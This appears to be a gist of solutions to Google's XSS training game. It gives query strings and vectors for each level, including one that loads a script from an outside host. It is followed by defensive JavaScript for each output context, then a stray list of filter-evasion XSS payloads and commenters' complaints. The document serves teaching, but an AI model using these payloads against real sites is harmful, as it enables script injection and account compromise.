Below are the solutions to Google XSS challenges hosted on https://xss-game.appspot.com/
########################## Level 1: Hello, world of XSS ##########################
*** Query ***
https://xss-game.appspot.com/level1/frame?query=<script>alert(1)</script>
*** Vector ***
<script>alert(1)</script>
########################## Level 2: Persistence is key ##########################
*** Vector ***
"><img src=x onerror=alert(1)>
########################## Level 3: That sinking feeling... ##########################
*** Query ***
https://xss-game.appspot.com/level3/frame#'/><script>alert(1)</script>
*** Vector ***
'/><script>alert(1)</script>
########################## Level 4: Context matters ##########################
*** Query ***
https://xss-game.appspot.com/level4/frame?timer=1')%3Balert('1
*** Vector ***
1')%3Balert('1
########################## Level 5: Breaking protocol ##########################
*** Query ***
https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1)
*** Vector ***
javascript:alert(1)
########################## Follow the 🐇 ##########################
*** Query ***
https://xss-game.appspot.com/level6/frame#HTTPS://dj-infosec.divshot.io/content.js
*** Vector ***
HTTPS://dj-infosec.divshot.io/content.js
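Each vector above breaks out of a different output context, so each needs a different fix. The following is an added example, not part of the original gist, of context-specific handling that stops them. The sink descriptions in the comments are assumptions about the challenge pages, and the function names and the relative paths used for testing are hypothetical.

```javascript
// Added example: one defence per output context targeted by the vectors above.

// HTML body / attribute context (levels 1-3, assumed: input is written into markup).
// Encoding the five significant characters keeps the input as inert text.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Inline script context (level 4, assumed: `timer` is placed inside a quoted JS
// argument). The value should be a number of seconds, so validate the type
// instead of escaping. Returns null for anything that is not a short integer.
function parseTimer(value) {
  return /^\d{1,4}$/.test(value) ? Number(value) : null;
}

// href context (level 5, assumed: `next` becomes a link target). Resolve the
// value the way the browser would, then allow only same-origin http(s) URLs.
function safeNextLink(next, pageUrl) {
  let target;
  try { target = new URL(next, pageUrl); } catch { return null; }
  if (target.protocol !== "https:" && target.protocol !== "http:") return null;
  return target.origin === new URL(pageUrl).origin ? target.href : null;
}

// Script-loader context (level 6, assumed: the fragment becomes a script src and
// the page's filter is a case-sensitive test for a lowercase http(s) prefix).
// Parsing first normalises the scheme case; the origin is then checked against
// an allowlist rather than a blocklist pattern.
function allowedScriptUrl(src, pageUrl, allowedOrigins) {
  let target;
  try { target = new URL(src, pageUrl); } catch { return null; }
  return allowedOrigins.includes(target.origin) ? target.href : null;
}
```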
Good good this is link
"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
';a=prompt,a()//
'-eval("window'pro'%2B'mpt'")-'
"-eval("window'pro'%2B'mpt'")-"
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y
<image/src/onerror=prompt(8)>
<img/src/onerror=prompt(8)>
<image src/onerror=prompt(8)>
<img src/onerror=prompt(8)>
</scrip</script>t>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'"><\x3Cscript>javascript:alert(1)</script> '
"><\x00script>javascript:alert(1)</script>
'-eval("window'pro'%2B'mpt'")-'
Nothing is clear, please explain.
Note: Those aren't the only ways.
For example:
Also: At levels 3 and 6, you don't get any input/textarea element, so I have no damn idea how you used those "Vector" solutions. As for level 5, something seemed odd to me, as I remembered having tried that "vector" solution, but I tried it again to make sure, and, as expected, it didn't work.